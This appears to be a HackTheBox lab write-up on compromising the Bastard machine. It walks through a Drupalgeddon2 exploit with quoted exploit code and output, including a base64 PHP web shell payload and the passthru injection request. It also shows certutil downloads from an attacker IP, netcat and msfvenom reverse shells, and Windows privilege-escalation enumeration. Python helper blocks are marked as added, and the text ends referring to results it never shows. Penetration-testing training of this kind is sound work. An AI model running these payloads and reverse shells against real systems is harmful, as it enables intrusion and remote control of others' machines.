Target: Bastard (10.10.10.9)

Greetings, in the last post in my OSCP preparation series we covered SolidState. Today we will be tackling Bastard, a medium difficulty Windows machine created by the HackTheBox user ch4p.

In this writeup we will examine how to achieve an initial foothold by exploiting Drupal, two methods of using RCE to gain a reverse shell, and how to elevate privileges by abusing a vulnerable Windows feature.

Let’s get started!

Reconnaissance

We’ll kick things off by running an initial Nmap scan on the target:

sudo nmap -T4 -sV -sC -oA bastard_sudoNMAP_sV_sC_scan01 10.10.10.9

  • -T4 Sets the timing template of our scan to be fairly quick
  • -sC Will run a default script scan against the target with NSE (Nmap Scripting Engine)
  • -sV Will probe open ports to determine service/version info
  • -oA Will write the scan report in all three formats at once (normal, XML and grepable), using the given basename

Nmap scan report for 10.10.10.9
Host is up (0.054s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_ Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
135/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

With our Nmap scan completed, the report shows MSRPC exposed on TCP 135 and 49154, and a Microsoft IIS 7.5 web server on TCP port 80 with Drupal 7 installed (the http-generator header gives away the major version, but not the exact release).

Now, some of you hackers reading this may have alarm bells going off in your head right now and so did I when first discovering Drupal on this host.

Drupal is an open-source web content management framework written in PHP.

For those who may be unaware, Drupal has been hit by a series of notorious vulnerabilities collectively known as ‘Drupalgeddon’.

Let’s attempt to identify if our target may be susceptible to ‘Drupalgeddon’.

Firstly, we will query ExploitDB using searchsploit:

searchsploit Drupal 7

Great, searchsploit reports that there are numerous exploits for ‘Drupalgeddon’ available. However, given that our previous Nmap scan did not retrieve the exact version of Drupal 7 running on our target host, we will need to dig deeper to identify the specific version information.

Luckily there are some wonderful tools available that can aid with this. Two of the best enumeration tools I have found for Drupal are ‘droopescan’ and ‘Drupwn’. We can use these tools to acquire the version information from the target system. It should be noted that ‘droopescan’ can take quite a while to run (the scan below took about 47 minutes), but it is a great tool all the same.

Let’s fire up some scans and see what comes back!

Drupwn

python3 drupwn --users --nodes --thread 20 --mode enum --target http://10.10.10.9 | tee drupwn_U_N_enum01

[-] Version not specified, trying to identify it

[+] Version detected: 7.54

============ Users ============

[+] ***** (id=1)
[+] ***** (id=6)
[+] ***** (id=5)

============ Nodes ============

http://10.10.10.9/node/1

droopescan

droopescan scan drupal -u http://10.10.10.9/ | tee droopescan_results01

[+] Plugins found:
ctools http://10.10.10.9/sites/all/modules/ctools/
http://10.10.10.9/sites/all/modules/ctools/CHANGELOG.txt
http://10.10.10.9/sites/all/modules/ctools/changelog.txt
http://10.10.10.9/sites/all/modules/ctools/CHANGELOG.TXT
http://10.10.10.9/sites/all/modules/ctools/LICENSE.txt
http://10.10.10.9/sites/all/modules/ctools/API.txt
libraries http://10.10.10.9/sites/all/modules/libraries/
http://10.10.10.9/sites/all/modules/libraries/CHANGELOG.txt
http://10.10.10.9/sites/all/modules/libraries/changelog.txt
http://10.10.10.9/sites/all/modules/libraries/CHANGELOG.TXT
http://10.10.10.9/sites/all/modules/libraries/README.txt
http://10.10.10.9/sites/all/modules/libraries/readme.txt
http://10.10.10.9/sites/all/modules/libraries/README.TXT
http://10.10.10.9/sites/all/modules/libraries/LICENSE.txt
services http://10.10.10.9/sites/all/modules/services/
http://10.10.10.9/sites/all/modules/services/README.txt
http://10.10.10.9/sites/all/modules/services/readme.txt
http://10.10.10.9/sites/all/modules/services/README.TXT
http://10.10.10.9/sites/all/modules/services/LICENSE.txt
image http://10.10.10.9/modules/image/
profile http://10.10.10.9/modules/profile/
php http://10.10.10.9/modules/php/

[+] Themes found:
seven http://10.10.10.9/themes/seven/
garland http://10.10.10.9/themes/garland/

[+] Possible version(s):
7.54

[+] Possible interesting urls found:
Default changelog file - http://10.10.10.9/CHANGELOG.txt
Default admin - http://10.10.10.9/user/login

[+] Scan finished (0:46:54.200528 elapsed)

Excellent, both scans agree on the version of the Drupal installation: 7.54.

In addition to these scans, performing file and directory enumeration against the target can also be leveraged to locate the version information manually. For example, OWASP ZAP reports that the file ‘CHANGELOG.txt’ is present on the web server:

It is always a good idea to look for changelog, readme and install files left in the web root of a server or application, as these tend to disclose exact versions and installed components that aid the attack process.

http://10.10.10.9/changelog.txt

Drupal 7.54, 2017-02-01
-----------------------
- Modules are now able to define theme engines (API addition:
  https://www.drupal.org/node/2826480).
- Logging of searches can now be disabled (new option in the administrative
  interface).
- Added menu tree render structure to (pre-)process hooks for theme_menu_tree()
  (API addition: https://www.drupal.org/node/2827134).
- Added new function for determining whether an HTTPS request is being served
  (API addition: https://www.drupal.org/node/2824590).
- Fixed incorrect default value for short and medium date formats on the date
  type configuration page.
- File validation error message is now removed after subsequent upload of valid
  file.
- Numerous bug fixes.
- Numerous API documentation improvements.
- Additional performance improvements.
- Additional automated test coverage.

In this context, investigating the ‘CHANGELOG.txt’ file on the web server will also confirm that the current version of the Drupal installation is 7.54.

Now that we are aware of the exact version of Drupal running on the target, we now have enough information to begin our exploitation process!

Exploitation

If we recall the results from our searchsploit query earlier, we’ll notice that there are a number of available exploits that we could utilize against the version of Drupal that we are targeting:

Since the OSCP exam greatly restricts the usage of the Metasploit Framework, we will not make use of Metasploit modules to exploit this vulnerability. While this may appear to be a nuisance to those of you who are currently in the process of preparing for your exam, I can personally guarantee that attacking targets without being over reliant on the Metasploit Framework will make you a better hacker!

With this in mind, it appears that the ‘Drupalgeddon2’ remote code execution exploit will be suitable for attacking our Drupal 7.54 installation:

Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - ‘Drupalgeddon2’ Remote Code Execution | php/webapps/44449.rb

Before we fire off our exploit, let’s first analyze what conditions cause this vulnerability and how our exploit leverages this to achieve remote code execution.

Vulnerability and Exploit Analysis

This vulnerability was made public on March 28th, 2018 by the Drupal core security team in a security advisory titled SA-CORE-2018-002, which details a remote code execution vulnerability identified as CVE-2018-7600. This vulnerability exists in Drupal versions 7.x before 7.58, 8.3.x versions before 8.3.9, 8.4.x versions before 8.4.6, and 8.5.x before 8.5.1.
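As an added illustration (this is not code from the original post), here is a small Python check that pulls the version string out of a Drupal CHANGELOG.txt, as fetched from the target above, and tests it against the four fixed versions listed in SA-CORE-2018-002. The changelog sample is constructed from the excerpt the target served; treating the end-of-life 8.0 to 8.2 branches, which never received a fix, as affected is my own judgement rather than the advisory's wording.

```python
import re
from typing import Optional, Tuple

# Added example, not code from the original post. Fixed versions are those
# listed in SA-CORE-2018-002 (CVE-2018-7600); the changelog sample below is
# constructed from the excerpt the target served.

# Branch -> first fixed version.
FIXED_IN = {
    (7,): (7, 58),
    (8, 3): (8, 3, 9),
    (8, 4): (8, 4, 6),
    (8, 5): (8, 5, 1),
}

# Drupal 7 changelog entries start "Drupal 7.54, 2017-02-01", newest first.
_ENTRY_RE = re.compile(r"^Drupal (\d+(?:\.\d+)+), \d{4}-\d{2}-\d{2}\s*$", re.MULTILINE)


def parse_version(version: str) -> Tuple[int, ...]:
    return tuple(int(part) for part in version.split("."))


def version_from_changelog(text: str) -> Optional[str]:
    """Return the first (i.e. current) release listed in CHANGELOG.txt, or None."""
    match = _ENTRY_RE.search(text)
    return match.group(1) if match else None


def drupalgeddon2_affected(version: str) -> bool:
    """True if this version is covered by SA-CORE-2018-002 (CVE-2018-7600)."""
    v = parse_version(version)
    if v[0] == 7:
        return v < FIXED_IN[(7,)]
    if v[0] == 8:
        branch = v[:2]
        if branch in FIXED_IN:
            return v < FIXED_IN[branch]
        # 8.0-8.2 were end-of-life when the advisory shipped and got no fix:
        # treated as affected here (my judgement, not the advisory's wording).
        # 8.6 and later were released after the fix.
        return branch < (8, 3)
    raise ValueError(f"Drupal {version} is outside the advisory's scope")


# Constructed sample, shaped like the CHANGELOG.txt the target returned.
SAMPLE_CHANGELOG = """\
Drupal 7.54, 2017-02-01
-----------------------
- Modules are now able to define theme engines (API addition:
  https://www.drupal.org/node/2826480).
- Numerous bug fixes.

Drupal 7.53, 2016-12-07
-----------------------
- Numerous bug fixes.
"""


def check_changelog(text: str) -> Tuple[Optional[str], Optional[bool]]:
    """(version, affected) for a changelog body; (None, None) if no release line is found."""
    version = version_from_changelog(text)
    return version, (drupalgeddon2_affected(version) if version else None)


if __name__ == "__main__":
    version, affected = check_changelog(SAMPLE_CHANGELOG)
    print(f"Drupal {version}: {'affected' if affected else 'not affected'} by CVE-2018-7600")
```

Feed it the body of http://10.10.10.9/CHANGELOG.txt and it reports 7.54 as affected; the same comparison is what searchsploit's "< 7.58" title is shorthand for.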

The vulnerability occurs because user-supplied input reaching the Drupal Form API is not sufficiently sanitized. Drupal’s Form API predates version 7 and lets modules alter form data during the form rendering process; in Drupal 7 it was generalised into a construct known as ‘Render Arrays’. In Drupal, render arrays are structured arrays that contain data and associated properties that determine how the data within an array should be rendered into HTML/Markup. These structured arrays are organized in a key-value pair format that can be passed as arguments to functions or form data in order to render UI elements. These property keys are prefixed by a ‘#’ character, as we can see in the example below:

$page = array(
  '#show_messages' => TRUE,
  '#theme' => 'page',
  '#type' => 'page',
  'content' => array(
    'system_main' => array(...),
    'another_block' => array(...),
    '#sorted' => TRUE,
  ),
  'sidebar_first' => array(
    ...
  ),
  'footer' => array(
    ...
  ),
  ...
);

Exploits targeting Drupalgeddon2 smuggle such properties into a render array through crafted HTTP and AJAX requests to the Form API. Because vulnerable versions do not strip attacker-supplied request keys beginning with ‘#’, the injected properties take part in rendering, and the AJAX machinery can be made to hand the rendered element back to the attacker. The remote code execution itself occurs because the renderer (Renderer::doRender() in Drupal 8, drupal_render() in Drupal 7) treats certain properties as callbacks: whoever controls those properties can name any PHP function as the callback and choose the argument it is invoked with.

The properties the renderer treats as callbacks include:

  • #post_render
  • #pre_render
  • #access_callback
  • #lazy_builder

#lazy_builder and #access_callback exist only in the Drupal 8 renderer; the Drupal 7 path used in this writeup relies on #post_render, whose callback receives the element’s rendered markup as its first argument, which is why the ‘#markup’ value ends up being the command. Examples of PHP functions that yield code execution when supplied as the callback include ‘exec’ and ‘passthru’.

Now that we have a general understanding of the vulnerability, let’s examine how our exploit gains code execution in Drupal 7.x as the version we are targeting falls within this category.

Firstly, we can modify our exploit code to tunnel through a proxy in order to aid in identifying what occurs when we launch our attack:

# Settings - Proxy information (nil to disable)
$proxy_addr = '127.0.0.1'
$proxy_port = 8080 

Starting on line 25, we’ll set $proxy_addr to our localhost and use Burp Suite to intercept the traffic.

Now that our proxy is configured, let’s determine how the exploit verifies what version of Drupal is present on the target:

# Try and get version
$drupalverion = ""

# Possible URLs
url = [
  # --- changelog ---
  # Drupal v6.x / v7.x [200]
  $target + "CHANGELOG.txt",
  # Drupal v8.x [200]
  $target + "core/CHANGELOG.txt",

  # --- bootstrap ---
  # Drupal v7.x / v6.x [403]
  $target + "includes/bootstrap.inc",
  # Drupal v8.x [403]
  $target + "core/includes/bootstrap.inc",

  # --- database ---
  # Drupal v7.x / v6.x  [403]
  $target + "includes/database.inc",
  # Drupal v7.x [403]
  #$target + "includes/database/database.inc",
  # Drupal v8.x [403]
  #$target + "core/includes/database.inc",

  # --- landing page ---
  # Drupal v8.x / v7.x [200]
  $target,
]
 

In the code shown above, the exploit fingerprints the version from ‘CHANGELOG.txt’ where that file is readable. Where it is blocked, it falls back to probing ‘includes/bootstrap.inc’ and ‘includes/database.inc’ (the path that exists, and therefore answers 403 rather than 404, tells a 6.x/7.x layout apart from 8.x) and finally the landing page. On this target CHANGELOG.txt answers 200, as our manual check already showed.

HTTP Request within Burp Suite

Once the version has been identified, the exploit sends further HTTP requests to confirm that the vulnerable form is reachable. For Drupal 7 targets this is the password-reset form at user/password (user/register for Drupal 8).

It also checks whether Drupal’s clean URLs are enabled, which decides whether paths can be requested directly or must be passed as ?q=<path>:

# The attack vector to use
$form = $drupalverion.start_with?("8")? "user/register" : "user/password"

# Make a request, check for form
url = "#{$target}?q=#{$form}"
puts action("Testing: Form   (#{$form})")
response = http_request(url, 'get', '', $session_cookie)
if response.code == "200" and not response.body.empty?
  puts success("Result : Form valid")
elsif response['location']
  puts error("Target is NOT exploitable [5] (HTTP Response: #{response.code})...   Could try following the redirect: #{response['location']}")
  exit
elsif response.code == "404"
  puts error("Target is NOT exploitable [4] (HTTP Response: #{response.code})...   Form disabled?")
  exit
elsif response.code == "403"
  puts error("Target is NOT exploitable [3] (HTTP Response: #{response.code})...   Form blocked?")
  exit
elsif response.body.empty?
  puts error("Target is NOT exploitable [2] (HTTP Response: #{response.code})...   Got an empty response")
  exit
else
  puts warning("WARNING: Target may NOT exploitable [1] (HTTP Response: #{response.code})")
end


puts "- "*40
 

Moving on, the exploit tests for code execution by sending an HTTP POST request carrying a crafted render array for one of the form’s elements. For Drupal 7 that element is ‘name’, the username field of the password-reset form. The exploit generates a random string and tries to have the target echo it; if the string comes back in the response, code execution is confirmed.

# Values in gen_evil_url for Drupal v7.x
elementsv7 = [
  "name",
]

elements = $drupalverion.start_with?("8") ? elementsv8 : elementsv7

elements.each do|e|
  $element = e

  # Make a request, testing code execution
  puts action("Testing: Code Execution   (Method: #{$element})")

  # Generate a random string to see if we can echo it
  random = (0...8).map { (65 + rand(26)).chr }.join
  url, payload = gen_evil_url("echo #{random}", e)
 

Once code execution is confirmed, the exploit sends further requests: for each candidate path it first checks whether a PHP web shell already exists there and, if not, tries to write one:

# Location of web shell & used to signal if using PHP shell
webshellpath = ""
prompt = "drupalgeddon2"

# Possibles paths to try
paths = [
  # Web root
  "",
  # Required for setup
  "sites/default/",
  "sites/default/files/",
  # They did something "wrong", chmod -R 0777 .
  #"core/",
]
# Check all (if doing web shell)
paths.each do|path|
  # Check to see if there is already a file there
  puts action("Testing: Existing file   (#{$target}#{path}#{webshell})")

  response = http_request("#{$target}#{path}#{webshell}", 'get', '', $session_cookie)
  if response.code == "200"
    puts warning("Response: HTTP #{response.code} // Size: #{response.size}.   ***Something could already be there?***")
  else
    puts info("Response: HTTP #{response.code} // Size: #{response.size}")
  end

  puts "- "*40
  # ... the exploit then tries to write the web shell to this path (omitted here)
end

Lastly, if no web path turns out to be writable, the exploit falls back to an interactive prompt. Each command we type is submitted to the target through a fresh pair of HTTP requests, so nothing is left on disk.

Let’s look at an example of that now:

HTTP Requests:

As we can see in the HTTP request above, the exploit sends POST data to the vulnerable form URI:

/?q=user/password

The vulnerable rendering element ‘name’ is also included:

/?q=user/password&name

The rendering element is given a ‘#post_render’ property whose value is the name of a PHP callback, here ‘passthru’:

/?q=user/password&name[%23post_render][]=passthru

The rendering element is then passed the ‘#type’ property to declare that the type of the form element is Markup:

/?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup

Lastly, ‘#markup’ carries the string that is handed to the callback as its argument, i.e. our command, so passthru('whoami') runs when the element is rendered:

/?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=whoami

The POST body that accompanies this URL is form_id=user_pass&_triggering_element_name=name. Drupal’s reply contains a form_build_id for the cached form, and the exploit then posts that id to file/ajax/name/#value/<form_build_id>, which makes the AJAX handler re-render the cached ‘name’ element and fire our callback. The command output therefore arrives in the response to that second request.

Achieving Remote Code Execution

Now that we have a good understanding of how our exploit operates, let’s use it to gain code execution!

ruby drupalgeddon2.rb http://10.10.10.9/ | tee dg_run01

[*] --==[::#Drupalggedon2::]==--
--------------------------------------------------------------------------------
[i] Target : http://10.10.10.9/
[i] Proxy : 127.0.0.1:8080
--------------------------------------------------------------------------------
[+] Found : http://10.10.10.9/CHANGELOG.txt (HTTP Response: 200)
[+] Drupal!: v7.54
--------------------------------------------------------------------------------
[*] Testing: Form (user/password)
[+] Result : Form valid
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Clean URLs
[+] Result : Clean URLs enabled
--------------------------------------------------------------------------------
[*] Testing: Code Execution (Method: name)
[i] Payload: echo ZGQGYTHT
[+] Result : ZGQGYTHT
[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!
--------------------------------------------------------------------------------
[*] Testing: Existing file (http://10.10.10.9/shell.php)
[i] Response: HTTP 404 // Size: 12
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Writing To Web Root (./)
[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee shell.php
[!] Target is NOT exploitable [2-4] (HTTP Response: 404)... Might not have write access?
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Existing file (http://10.10.10.9/sites/default/shell.php)
[i] Response: HTTP 404 // Size: 12
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Writing To Web Root (sites/default/)
[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee sites/default/shell.php
[!] Target is NOT exploitable [2-4] (HTTP Response: 404)... Might not have write access?
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Existing file (http://10.10.10.9/sites/default/files/shell.php)
[i] Response: HTTP 404 // Size: 12
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Writing To Web Root (sites/default/files/)
[*] Moving : ./sites/default/files/.htaccess
[i] Payload: mv -f sites/default/files/.htaccess sites/default/files/.htaccess-bak; echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee sites/default/files/shell.php
[!] Target is NOT exploitable [2-4] (HTTP Response: 404)... Might not have write access?
[!] FAILED : Couldn't find a writeable web path
--------------------------------------------------------------------------------
[*] Dropping back to direct OS commands
drupalgeddon2>> whoami
nt authority\iusr

Awesome! We now have remote code execution on the target machine!

However, the web shell could not be written, and it is worth noting why: the exploit’s shell writer relies on Linux utilities (base64 -d, tee, mv -f) that do not exist on a Windows host, so the failure says nothing about whether the IUSR account can write to the web root. The built-in web shell simply is not the right tool for this target.

Let’s explore how we can leverage our code execution to gain a shell on the system.

RCE to Shell

In this section we will investigate two methods to accomplish this goal.

Firstly, I can say with confidence that you will most likely encounter this type of obstacle during both your OSCP exam and real-world engagements. Therefore, it would be wise to become acquainted with how to overcome this hurdle.

The techniques that we will employ can be used against numerous targets. Personally, I have found great success with these methods when attacking Windows systems and with a slight amount of alteration, they can be used against Linux systems as well.

Enough preamble, let’s jump into the first approach!

Method 0x01: Netcat Binary Transfer

Our first method entails transferring ‘nc.exe‘ to the target system, which can then be utilized to achieve a reverse shell.

Within Kali Linux, there are numerous Windows tools and binaries included by default. These can be found within the following directory:

/usr/share/windows-resources/

Our ‘nc.exe‘ file, along with many other helpful binaries, can be located in this aptly named sub-directory:

/usr/share/windows-resources/binaries/

To begin transferring this file to our target, we’ll go ahead and fire up a simple web server from within this directory that can host our binary:

python -m SimpleHTTPServer

Serving HTTP on 0.0.0.0 port 8000 ...

(That is the Python 2 module; on a current Kali where python is Python 3, the equivalent is python3 -m http.server, which also defaults to port 8000.)

Now that our file is ready to be served, we will switch back over to our exploit. From here, we can make use of our code execution to download the netcat executable from our attacking machine and write it to the victim machine:

drupalgeddon2>> certutil.exe -urlcache -split -f "http://10.10.14.52:8000/nc.exe" nc.exe

Excellent, our binary has now been stored on the target system.

Note that using ‘certutil.exe‘ in this manner is a convenient way to pull files onto Windows systems that have no other tooling. Be aware that it is also one of the most heavily signatured living-off-the-land download techniques, so on a monitored host expect it to be logged or blocked. In future posts, we will discuss Windows file transfer methods at length.

For now, let’s continue by opening up a listener on our local machine to catch our reverse shell:

sudo rlwrap nc -nlvp 443

With our listener ready, we will return to our exploit once more to send a reverse shell using the netcat executable:

drupalgeddon2>> nc.exe -e C:\Windows\System32\cmd.exe 10.10.14.52 443

Method 0x02: MSFVenom Malicious Binary

In our second approach, we can utilize MSFVenom to generate an executable that sends us a reverse shell when run.

Note that MSFVenom is one of the few aspects of the Metasploit Framework that is not restricted on the exam and you should become very familiar with it.

To start, we can utilize our command execution to obtain detailed information about the system to aid in our payload creation:

drupalgeddon2>> systeminfo

Host Name: BASTARD
OS Name: Microsoft Windows Server 2008 R2 Datacenter
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00496-001-0001283-84782
Original Install Date: 18/3/2017, 7:04:46
System Boot Time: 25/5/2020, 2:29:25
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC

We will continue by invoking the MSFVenom command and configuring it to create a payload that is suited for our target system:

msfvenom --platform Windows -p windows/x64/shell_reverse_tcp LHOST=10.10.14.52 LPORT=443 -e x64/xor_dynamic -a x64 -f exe > shelly.exe

Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x64/xor_dynamic
x64/xor_dynamic succeeded with size 510 (iteration=0)
x64/xor_dynamic chosen with final size 510
Payload size: 510 bytes
Final size of exe file: 7168 bytes

  • --platform Declares the target platform the payload will be crafted for
  • -p Specifies the payload to be used
  • LHOST/LPORT Instructs the payload to connect back to the specified attacking host IP and port
  • -e Configures the payload to be encoded with an encoder of our choosing
  • -a Sets the architecture of the target system
  • -f Declares what format the payload should be crafted for

Here’s a tip that may come in handy when working with binary files. UPX is a tool that compresses executables, which shrinks what you have to push over the wire; that is useful on slow pivots, although a msfvenom executable like this one is only a few kilobytes to begin with, so the gain here is small.

Do not count on it for stealth, though. A UPX-packed executable is itself a classic anti-virus heuristic, and packing can draw more attention from endpoint controls rather than less. Large transfers can indeed attract the notice of vigilant administrators or of monitoring systems, and reducing your footprint and noise whenever possible is good practice, but compression is a bandwidth measure, not an evasion one.

Now that we have crafted a malicious executable, we will need to transfer it to the machine. We’ll achieve this through the use of ‘certutil.exe‘, as with the previous method.

We’ll begin by spinning up our HTTP server once more:

python -m SimpleHTTPServer

Serving HTTP on 0.0.0.0 port 8000 ...

(Or python3 -m http.server on a Python 3 system.)

Next, we will return to our exploit to download the file from our local system and place it on the remote host:

drupalgeddon2>> certutil.exe -urlcache -split -f "http://10.10.14.52:8000/shelly.exe" shelly.exe

With our executable placed on the target system, we’ll continue by opening up a listener on our local system:

sudo rlwrap nc -nlvp 443

Finally, we will utilize our command execution to run the malicious executable and receive a reverse shell:

drupalgeddon2>> shelly.exe

Given that we now have access to a fully functional shell, let’s grab the user.txt flag!

C:\inetpub\drupal-7.54>dir C:\Users
dir C:\Users
Volume in drive C has no label.
Volume Serial Number is 605B-4AAA

Directory of C:\Users

19/03/2017 08:35 <DIR> .
19/03/2017 08:35 <DIR> ..
19/03/2017 02:20 <DIR> Administrator
19/03/2017 02:54 <DIR> Classic .NET AppPool
19/03/2017 08:35 <DIR> dimitris
14/07/2009 07:57 <DIR> Public
0 File(s) 0 bytes
6 Dir(s) 30.807.928.832 bytes free

C:\inetpub\drupal-7.54>cd C:\Users\dimitris\Desktop
cd C:\Users\dimitris\Desktop

C:\Users\dimitris\Desktop>type user.txt

Privilege Escalation

So far we have achieved remote command execution on the target, leveraged it to gain a shell, and collected the user flag. Now we will attempt to escalate our privileges.

To start, we’ll transfer over some nifty enumeration scripts to our target in order to aid with our enumeration process.

Here are several that are great for Windows systems:

Powerless

https://github.com/M4ximuss/Powerless

Windows Privilege Escalation Awesome Scripts (WinPEAS)

https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS

WindowsEnum

https://github.com/absolomb/WindowsEnum

After selecting an enumeration script, we’ll go ahead and transfer it to the target. We can make use of the ‘certutil.exe’ method mentioned earlier, or we can utilize the ‘nc.exe’ binary to perform the file transfer.

Once our script is placed on the remote host, we can use our script(s) in conjunction with manual enumeration to acquire as much information as possible about the target system.

An essential enumeration method when targeting Windows systems is to invoke the ‘systeminfo‘ command. This will allow us to obtain detailed information about the host we are targeting:

C:\> systeminfo

systeminfo

Host Name: BASTARD
OS Name: Microsoft Windows Server 2008 R2 Datacenter
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00496-001-0001283-84782
Original Install Date: 18/3/2017, 7:04:46
System Boot Time: 25/5/2020, 2:29:25
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
[02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 2.047 MB
Available Physical Memory: 1.570 MB
Virtual Memory: Max Size: 4.095 MB
Virtual Memory: Available: 3.595 MB
Virtual Memory: In Use: 500 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.9

The line that matters most in that output is ‘Hotfix(s): N/A’: no patches at all are installed on this Windows Server 2008 R2 build 7600 host, which makes it a prime candidate for a kernel or service privilege-escalation exploit.

Once we have acquired this information, we can feed the output into a handy tool known as ‘windows-exploit-suggester.py’. This tool compares the patch level of the target against Microsoft’s security bulletin database to detect potentially missing patches.

However, be aware that this tool is now outdated. While it is still effective against older versions of Windows, it is not advised for more modern versions of the operating system, as Microsoft stopped updating the bulletin spreadsheet it depends on.

To combat this, we can use an updated tool inspired by the original, Windows Exploit Suggester Next Generation (WES-NG). It functions in essentially the same manner and returns a list of potential vulnerabilities based on the target’s systeminfo output.

In this context, the original tool will still work since our remote host is running Windows Server 2008 R2. Whichever tool you use, the result is a broad list of vulnerabilities that we may be able to leverage for privilege escalation, which then needs triage: what you want are the Elevation of Privilege entries, grouped by the KB that would have fixed them.
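The following is an added Python example (not code from the original post or from wesng) that does that triage: it parses the plain-text report wes.py prints, as shown further down in this writeup, keeps the Elevation of Privilege records, optionally only those wesng links a public exploit to, and groups the CVEs by missing KB. The sample report is constructed from three of the records reproduced on this page.

```python
from collections import defaultdict
from typing import Dict, List

# Added example, not code from the original post or from wesng. It parses the
# plain-text report wes.py prints and pulls out the records worth chasing for
# local privilege escalation. The sample report is constructed from three of
# the records shown in this writeup.

Record = Dict[str, str]

SAMPLE_REPORT = """\
Windows Exploit Suggester 0.98 ( https://github.com/bitsadmin/wesng/ )
[+] Parsing systeminfo output
[+] Operating System
- Name: Windows Server 2008 R2 for x64-based Systems
- Build: 7600
- Installed hotfixes: None
[+] Found vulnerabilities

Date: 20110712
CVE: CVE-2011-1282
KB: KB2507938
Title: Vulnerabilities in Windows Client/Server Run-time Subsystem Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20110412
CVE: CVE-2011-0657
KB: KB2509553
Title: Vulnerability in DNS Resolution Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20111213
CVE: CVE-2011-3408
KB: KB2620712
Title: Vulnerability in Windows Client/Server Run-time Subsystem Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a
"""


def parse_wesng(report: str) -> List[Record]:
    """One dict per blank-line-separated block; blocks without a CVE (the header) are dropped."""
    records: List[Record] = []
    current: Record = {}
    for raw in report.splitlines() + [""]:   # trailing "" flushes the last block
        line = raw.strip()
        if not line:
            if "CVE" in current:
                records.append(current)
            current = {}
            continue
        key, sep, value = line.partition(":")  # first colon only: titles contain colons too
        if sep:
            current[key.strip()] = value.strip()
    return records


def eop_candidates(records: List[Record], exploits_only: bool = False) -> List[Record]:
    """Keep Elevation of Privilege entries; optionally only those with a known exploit link."""
    wanted = [r for r in records if r.get("Impact") == "Elevation of Privilege"]
    if exploits_only:
        wanted = [r for r in wanted if r.get("Exploit", "n/a").lower() != "n/a"]
    return wanted


def missing_kbs(records: List[Record]) -> Dict[str, List[str]]:
    """Group CVEs by the KB that would fix them: the shortest list of patches to check for."""
    by_kb: Dict[str, List[str]] = defaultdict(list)
    for r in records:
        by_kb[r["KB"]].append(r["CVE"])
    return dict(by_kb)


if __name__ == "__main__":
    recs = parse_wesng(SAMPLE_REPORT)
    for r in eop_candidates(recs):
        print(f"{r['CVE']:14} {r['KB']:10} {r['Title']}")
    print(missing_kbs(recs))
```

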